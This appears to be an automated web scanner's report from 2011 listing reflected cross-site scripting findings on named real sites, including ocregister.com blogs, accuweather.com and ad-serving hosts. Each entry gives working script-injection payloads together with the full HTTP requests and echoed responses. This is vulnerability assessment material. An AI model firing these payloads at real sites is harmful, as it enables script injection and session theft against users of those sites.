GET /coupon/d544/544003/index5.html?scid=1794971&cid=696829&tc=11020308002595319&rl_key=95f72aa00333e6f30e7f269538e0abb0&dynamic_proxy=17eb3a"><script>alert(1)</script>297f12ffdf6&primary_serv=gsbmtg1-px.rtrk.com&rl_track_landing_pages=1 HTTP/1.1 Host: gsbmtg.rtrk.com Proxy-Connection: keep-alive Referer: http://gsbmtg.rtrk.com/?scid=1794971 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: RlocalUID=scid%3D1794971%26cid%3D696829%26tc%3D11020308002595319; RlocalHilite=kw_hilite_off%3D0; RlocalTiming=landing_loadtime_off%3D0%26retarget_off%3D0; NSC_wt-vtb-susl-iuuq2=ffffffff096e1b7a45525d5f4f58455e445a4a423660
Response
HTTP/1.1 200 OK Date: Thu, 03 Feb 2011 16:12:31 GMT Server: Apache Vary: Accept-Encoding P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CUR OUR NOR" Content-Type: text/html Set-Cookie: NSC_wt-vtb-susl-iuuq=ffffffff096d1b7d45525d5f4f58455e445a4a423660;expires=Thu, 03-Feb-2011 16:41:22 GMT;path=/;httponly Content-Length: 2867
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
1.156. http://gsbmtg.rtrk.com/coupon/d544/544003/index5.html [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://gsbmtg.rtrk.com
Path:
/coupon/d544/544003/index5.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9de62"><script>alert(1)</script>2b2bf4c448b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /coupon/d544/544003/index5.html?scid=1794971&cid=696829&tc=11020308002595319&rl_key=95f72aa00333e6f30e7f269538e0abb0&dynamic_proxy=1&primary_serv=gsbmtg1-px.rtrk.com&rl_track_landing_pages=1&9de62"><script>alert(1)</script>2b2bf4c448b=1 HTTP/1.1 Host: gsbmtg.rtrk.com Proxy-Connection: keep-alive Referer: http://gsbmtg.rtrk.com/?scid=1794971 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: RlocalUID=scid%3D1794971%26cid%3D696829%26tc%3D11020308002595319; RlocalHilite=kw_hilite_off%3D0; RlocalTiming=landing_loadtime_off%3D0%26retarget_off%3D0; NSC_wt-vtb-susl-iuuq2=ffffffff096e1b7a45525d5f4f58455e445a4a423660
Response
HTTP/1.1 200 OK Date: Thu, 03 Feb 2011 16:14:22 GMT Server: Apache Vary: Accept-Encoding P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CUR OUR NOR" Content-Type: text/html Set-Cookie: NSC_wt-vtb-susl-iuuq=ffffffff096d1b7945525d5f4f58455e445a4a423660;expires=Thu, 03-Feb-2011 16:43:14 GMT;path=/;httponly Content-Length: 2873
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
The value of the primary_serv request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 27040"><script>alert(1)</script>aafc10e2bc0 was submitted in the primary_serv parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /coupon/d544/544003/index5.html?scid=1794971&cid=696829&tc=11020308002595319&rl_key=95f72aa00333e6f30e7f269538e0abb0&dynamic_proxy=1&primary_serv=gsbmtg1-px.rtrk.com27040"><script>alert(1)</script>aafc10e2bc0&rl_track_landing_pages=1 HTTP/1.1 Host: gsbmtg.rtrk.com Proxy-Connection: keep-alive Referer: http://gsbmtg.rtrk.com/?scid=1794971 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: RlocalUID=scid%3D1794971%26cid%3D696829%26tc%3D11020308002595319; RlocalHilite=kw_hilite_off%3D0; RlocalTiming=landing_loadtime_off%3D0%26retarget_off%3D0; NSC_wt-vtb-susl-iuuq2=ffffffff096e1b7a45525d5f4f58455e445a4a423660
Response
HTTP/1.1 200 OK Date: Thu, 03 Feb 2011 16:12:54 GMT Server: Apache Vary: Accept-Encoding P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CUR OUR NOR" Content-Type: text/html Set-Cookie: NSC_wt-vtb-susl-iuuq=ffffffff096d1b7945525d5f4f58455e445a4a423660;expires=Thu, 03-Feb-2011 16:41:45 GMT;path=/;httponly Content-Length: 2867
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
The value of the rl_key request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b8861"><script>alert(1)</script>1103dfbaf was submitted in the rl_key parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /coupon/d544/544003/index5.html?scid=1794971&cid=696829&tc=11020308002595319&rl_key=95f72aa00333e6f30e7f269538e0abb0b8861"><script>alert(1)</script>1103dfbaf&dynamic_proxy=1&primary_serv=gsbmtg1-px.rtrk.com&rl_track_landing_pages=1 HTTP/1.1 Host: gsbmtg.rtrk.com Proxy-Connection: keep-alive Referer: http://gsbmtg.rtrk.com/?scid=1794971 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: RlocalUID=scid%3D1794971%26cid%3D696829%26tc%3D11020308002595319; RlocalHilite=kw_hilite_off%3D0; RlocalTiming=landing_loadtime_off%3D0%26retarget_off%3D0; NSC_wt-vtb-susl-iuuq2=ffffffff096e1b7a45525d5f4f58455e445a4a423660
Response
HTTP/1.1 200 OK Date: Thu, 03 Feb 2011 16:12:13 GMT Server: Apache Vary: Accept-Encoding P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CUR OUR NOR" Content-Type: text/html Set-Cookie: NSC_wt-vtb-susl-iuuq=ffffffff096d1b7d45525d5f4f58455e445a4a423660;expires=Thu, 03-Feb-2011 16:41:05 GMT;path=/;httponly Content-Length: 2863
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
The value of the rl_track_landing_pages request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fd298"><script>alert(1)</script>b6146d9bf2b was submitted in the rl_track_landing_pages parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /coupon/d544/544003/index5.html?scid=1794971&cid=696829&tc=11020308002595319&rl_key=95f72aa00333e6f30e7f269538e0abb0&dynamic_proxy=1&primary_serv=gsbmtg1-px.rtrk.com&rl_track_landing_pages=1fd298"><script>alert(1)</script>b6146d9bf2b HTTP/1.1 Host: gsbmtg.rtrk.com Proxy-Connection: keep-alive Referer: http://gsbmtg.rtrk.com/?scid=1794971 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: RlocalUID=scid%3D1794971%26cid%3D696829%26tc%3D11020308002595319; RlocalHilite=kw_hilite_off%3D0; RlocalTiming=landing_loadtime_off%3D0%26retarget_off%3D0; NSC_wt-vtb-susl-iuuq2=ffffffff096e1b7a45525d5f4f58455e445a4a423660
Response
HTTP/1.1 200 OK Date: Thu, 03 Feb 2011 16:13:11 GMT Server: Apache Vary: Accept-Encoding P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CUR OUR NOR" Content-Type: text/html Set-Cookie: NSC_wt-vtb-susl-iuuq=ffffffff096d1b7845525d5f4f58455e445a4a423660;expires=Thu, 03-Feb-2011 16:42:03 GMT;path=/;httponly Content-Length: 2867
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
The value of the scid request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7c936"><script>alert(1)</script>e5cf5050a89 was submitted in the scid parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /coupon/d544/544003/index5.html?scid=17949717c936"><script>alert(1)</script>e5cf5050a89&cid=696829&tc=11020308002595319&rl_key=95f72aa00333e6f30e7f269538e0abb0&dynamic_proxy=1&primary_serv=gsbmtg1-px.rtrk.com&rl_track_landing_pages=1 HTTP/1.1 Host: gsbmtg.rtrk.com Proxy-Connection: keep-alive Referer: http://gsbmtg.rtrk.com/?scid=1794971 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: RlocalUID=scid%3D1794971%26cid%3D696829%26tc%3D11020308002595319; RlocalHilite=kw_hilite_off%3D0; RlocalTiming=landing_loadtime_off%3D0%26retarget_off%3D0; NSC_wt-vtb-susl-iuuq2=ffffffff096e1b7a45525d5f4f58455e445a4a423660
Response
HTTP/1.1 200 OK Date: Thu, 03 Feb 2011 16:11:11 GMT Server: Apache Vary: Accept-Encoding P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CUR OUR NOR" Content-Type: text/html Set-Cookie: NSC_wt-vtb-susl-iuuq=ffffffff096d1b7b45525d5f4f58455e445a4a423660;expires=Thu, 03-Feb-2011 16:40:02 GMT;path=/;httponly Content-Length: 2867
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
The value of the tc request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 41069"><script>alert(1)</script>db536dcf13f was submitted in the tc parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /coupon/d544/544003/index5.html?scid=1794971&cid=696829&tc=1102030800259531941069"><script>alert(1)</script>db536dcf13f&rl_key=95f72aa00333e6f30e7f269538e0abb0&dynamic_proxy=1&primary_serv=gsbmtg1-px.rtrk.com&rl_track_landing_pages=1 HTTP/1.1 Host: gsbmtg.rtrk.com Proxy-Connection: keep-alive Referer: http://gsbmtg.rtrk.com/?scid=1794971 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: RlocalUID=scid%3D1794971%26cid%3D696829%26tc%3D11020308002595319; RlocalHilite=kw_hilite_off%3D0; RlocalTiming=landing_loadtime_off%3D0%26retarget_off%3D0; NSC_wt-vtb-susl-iuuq2=ffffffff096e1b7a45525d5f4f58455e445a4a423660
Response
HTTP/1.1 200 OK Date: Thu, 03 Feb 2011 16:11:55 GMT Server: Apache Vary: Accept-Encoding P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CUR OUR NOR" Content-Type: text/html Set-Cookie: NSC_wt-vtb-susl-iuuq=ffffffff096d1b7745525d5f4f58455e445a4a423660;expires=Thu, 03-Feb-2011 16:40:47 GMT;path=/;httponly Content-Length: 2867
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
The value of the load request parameter is copied into the XML document as plain text between tags. The payload 5cf32<a%20xmlns%3aa%3d'http%3a//www.w3.org/1999/xhtml'><a%3abody%20onload%3d'alert(1)'/></a>318d6c3ecd0 was submitted in the load parameter. This input was echoed as 5cf32<a xmlns:a='http://www.w3.org/1999/xhtml'><a:body onload='alert(1)'/></a>318d6c3ecd0 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The response into which the attack is echoed contains XML data, which is not by default processed by the browser as HTML. However, by injecting XML elements which create a new namespace it is possible to trick some browsers (including Firefox) into processing part of the response as HTML. Note that this proof-of-concept attack is designed to execute when processed by the browser as a standalone response, not when the XML is consumed by a script within another page.
The value of the h request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 74ac4'%3balert(1)//23282effb6e was submitted in the h parameter. This input was echoed as 74ac4';alert(1)//23282effb6e in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /tag.jsp?pid=7C8A652&w=300&h=25074ac4'%3balert(1)//23282effb6e&rnd=1219859 HTTP/1.1 Host: guru.sitescout.com Proxy-Connection: keep-alive Referer: http://www.local.com/dart/?ag=True&p=locm.pp&pos=2&t=2&sz=300x250&ord=1296748882748&k=banks&l=Dallas%2c+TX Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Server: Apache-Coyote/1.1 Cache-Control: max-age=0,no-cache,no-store Pragma: no-cache Expires: Tue, 11 Oct 1977 12:34:56 GMT Content-Type: application/x-javascript Content-Length: 384 Date: Thu, 03 Feb 2011 16:04:29 GMT
var myRand=parseInt(Math.random()*99999999);
var pUrl = "http://guru.sitescout.com/disp?pid=7C8A652&rand=" + myRand;
The value of the pid request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8759f"%3balert(1)//240ee4185ab was submitted in the pid parameter. This input was echoed as 8759f";alert(1)//240ee4185ab in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /tag.jsp?pid=7C8A6528759f"%3balert(1)//240ee4185ab&w=300&h=250&rnd=1219859 HTTP/1.1 Host: guru.sitescout.com Proxy-Connection: keep-alive Referer: http://www.local.com/dart/?ag=True&p=locm.pp&pos=2&t=2&sz=300x250&ord=1296748882748&k=banks&l=Dallas%2c+TX Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Server: Apache-Coyote/1.1 Cache-Control: max-age=0,no-cache,no-store Pragma: no-cache Expires: Tue, 11 Oct 1977 12:34:56 GMT Content-Type: application/x-javascript Content-Length: 384 Date: Thu, 03 Feb 2011 16:04:28 GMT Connection: close
var myRand=parseInt(Math.random()*99999999);
var pUrl = "http://guru.sitescout.com/disp?pid=7C8A6528759f";alert(1)//240ee4185ab&rand=" + myRand;
The value of the w request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d8e3b'%3balert(1)//7fbf4efe72 was submitted in the w parameter. This input was echoed as d8e3b';alert(1)//7fbf4efe72 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /tag.jsp?pid=7C8A652&w=300d8e3b'%3balert(1)//7fbf4efe72&h=250&rnd=1219859 HTTP/1.1 Host: guru.sitescout.com Proxy-Connection: keep-alive Referer: http://www.local.com/dart/?ag=True&p=locm.pp&pos=2&t=2&sz=300x250&ord=1296748882748&k=banks&l=Dallas%2c+TX Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Server: Apache-Coyote/1.1 Cache-Control: max-age=0,no-cache,no-store Pragma: no-cache Expires: Tue, 11 Oct 1977 12:34:56 GMT Content-Type: application/x-javascript Content-Length: 383 Date: Thu, 03 Feb 2011 16:04:28 GMT Connection: close
var myRand=parseInt(Math.random()*99999999);
var pUrl = "http://guru.sitescout.com/disp?pid=7C8A652&rand=" + myRand;
The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d33ef"><script>alert(1)</script>784ccd9e713 was submitted in the REST URL parameter 5. This input was echoed as d33ef\"><script>alert(1)</script>784ccd9e713 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /2011/02/02/trashed-h-b-house-on-good-morning-america/127042d33ef"><script>alert(1)</script>784ccd9e713/ HTTP/1.1 Host: huntingtonhomes.ocregister.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 Not Found Date: Thu, 03 Feb 2011 19:06:53 GMT Server: Apache X-Powered-By: PHP/5.2.5 Vary: Cookie X-Pingback: http://huntingtonhomes.ocregister.com/xmlrpc.php Expires: Wed, 11 Jan 1984 05:00:00 GMT Last-Modified: Thu, 03 Feb 2011 19:06:56 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 64846
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org ...[SNIP]... nate" type="application/rss+xml" title=" Page not found - Huntington Homes - www.ocregister.com" href="http://huntingtonhomes.ocregister.com/2011/02/02/trashed-h-b-house-on-good-morning-america/127042d33ef\"><script>alert(1)</script>784ccd9e713/feed/" /> ...[SNIP]...
1.167. http://huntingtonhomes.ocregister.com/2011/02/02/trashed-h-b-house-on-good-morning-america/127042/ [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 11603"><script>alert(1)</script>ec87b8f4492 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 11603\"><script>alert(1)</script>ec87b8f4492 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /2011/02/02/trashed-h-b-house-on-good-morning-america/127042/?11603"><script>alert(1)</script>ec87b8f4492=1 HTTP/1.1 Host: huntingtonhomes.ocregister.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Thu, 03 Feb 2011 19:06:29 GMT Server: Apache X-Powered-By: PHP/5.2.5 Vary: Cookie X-Pingback: http://huntingtonhomes.ocregister.com/xmlrpc.php Link: <http://huntingtonhomes.ocregister.com/?p=127042>; rel=shortlink Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 130070
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http: ...[SNIP]... ashed H.B. house on ‘Good Morning America’ - Huntington Homes - www.ocregister.com" href="http://huntingtonhomes.ocregister.com/2011/02/02/trashed-h-b-house-on-good-morning-america/127042/?11603\"><script>alert(1)</script>ec87b8f4492=1feed/" /> ...[SNIP]...
The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 44602"><script>alert(1)</script>cd83832419c was submitted in the REST URL parameter 5. This input was echoed as 44602\"><script>alert(1)</script>cd83832419c in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /2011/02/03/repod-green-home-is-back-on-the-market/12710044602"><script>alert(1)</script>cd83832419c/ HTTP/1.1 Host: huntingtonhomes.ocregister.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 Not Found Date: Thu, 03 Feb 2011 19:06:10 GMT Server: Apache X-Powered-By: PHP/5.2.5 Vary: Cookie X-Pingback: http://huntingtonhomes.ocregister.com/xmlrpc.php Expires: Wed, 11 Jan 1984 05:00:00 GMT Last-Modified: Thu, 03 Feb 2011 19:06:12 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 64828
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org ...[SNIP]... ternate" type="application/rss+xml" title=" Page not found - Huntington Homes - www.ocregister.com" href="http://huntingtonhomes.ocregister.com/2011/02/03/repod-green-home-is-back-on-the-market/12710044602\"><script>alert(1)</script>cd83832419c/feed/" /> ...[SNIP]...
1.169. http://huntingtonhomes.ocregister.com/2011/02/03/repod-green-home-is-back-on-the-market/127100/ [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload aba25"><script>alert(1)</script>01bcc28d4e8 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as aba25\"><script>alert(1)</script>01bcc28d4e8 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /2011/02/03/repod-green-home-is-back-on-the-market/127100/?aba25"><script>alert(1)</script>01bcc28d4e8=1 HTTP/1.1 Host: huntingtonhomes.ocregister.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Thu, 03 Feb 2011 19:06:07 GMT Server: Apache X-Powered-By: PHP/5.2.5 Vary: Cookie X-Pingback: http://huntingtonhomes.ocregister.com/xmlrpc.php Link: <http://huntingtonhomes.ocregister.com/?p=127100>; rel=shortlink Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 77988
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http: ...[SNIP]... po’d ‘green’ home is back on the market - Huntington Homes - www.ocregister.com" href="http://huntingtonhomes.ocregister.com/2011/02/03/repod-green-home-is-back-on-the-market/127100/?aba25\"><script>alert(1)</script>01bcc28d4e8=1feed/" /> ...[SNIP]...
1.170. http://hurricane.accuweather.com/hurricane/index.asp [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://hurricane.accuweather.com
Path:
/hurricane/index.asp
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 722b7"><script>alert(1)</script>9e1b639a6b3 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /hurricane/index.asp?722b7"><script>alert(1)</script>9e1b639a6b3=1 HTTP/1.1 Host: hurricane.accuweather.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET p3p: CP="NOI DSP COR ADMa DEVa TAIa PSAa PSDa IVAa IVDa CONi HISa OUR IND CNT" p3p: CP="NOI DSP COR ADMa DEVa TAIa PSAa PSDa IVAa IVDa CONi HISa OUR IND CNT" Content-Type: text/html Cache-Control: public, max-age=300 Expires: Thu, 03 Feb 2011 19:10:48 GMT Date: Thu, 03 Feb 2011 19:05:48 GMT Connection: close Connection: Transfer-Encoding Content-Length: 82496
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> ...[SNIP]... <a rel="nofollow" href="/hurricane/index.asp?722b7"><script>alert(1)</script>9e1b639a6b3=1&unit=f"> ...[SNIP]...
The value of the partner request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 81137"><script>alert(1)</script>7e000d53a18 was submitted in the partner parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /hurricane/index.asp?partner=accuweather81137"><script>alert(1)</script>7e000d53a18 HTTP/1.1 Host: hurricane.accuweather.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET p3p: CP="NOI DSP COR ADMa DEVa TAIa PSAa PSDa IVAa IVDa CONi HISa OUR IND CNT" p3p: CP="NOI DSP COR ADMa DEVa TAIa PSAa PSDa IVAa IVDa CONi HISa OUR IND CNT" Content-Type: text/html Cache-Control: public, max-age=300 Expires: Thu, 03 Feb 2011 19:10:51 GMT Date: Thu, 03 Feb 2011 19:05:51 GMT Connection: close Connection: Transfer-Encoding Content-Length: 82064
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> ...[SNIP]... <a rel="nofollow" href="/hurricane/index.asp?partner=accuweather81137"><script>alert(1)</script>7e000d53a18&unit=f"> ...[SNIP]...
The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f25b3"><script>alert(1)</script>e5fb01ad94c was submitted in the REST URL parameter 5. This input was echoed as f25b3\"><script>alert(1)</script>e5fb01ad94c in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /2011/02/03/tv-bride-won-more-surgery-than-she-knew/25744f25b3"><script>alert(1)</script>e5fb01ad94c/ HTTP/1.1 Host: inyourface.ocregister.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 Not Found Date: Thu, 03 Feb 2011 19:06:29 GMT Server: Apache X-Powered-By: PHP/5.2.5 Vary: Cookie X-Pingback: http://inyourface.ocregister.com/xmlrpc.php Expires: Wed, 11 Jan 1984 05:00:00 GMT Last-Modified: Thu, 03 Feb 2011 19:06:29 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 70357
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org ...[SNIP]... k rel="alternate" type="application/rss+xml" title=" Page not found - In Your Face - www.ocregister.com" href="http://inyourface.ocregister.com/2011/02/03/tv-bride-won-more-surgery-than-she-knew/25744f25b3\"><script>alert(1)</script>e5fb01ad94c/feed/" /> ...[SNIP]...
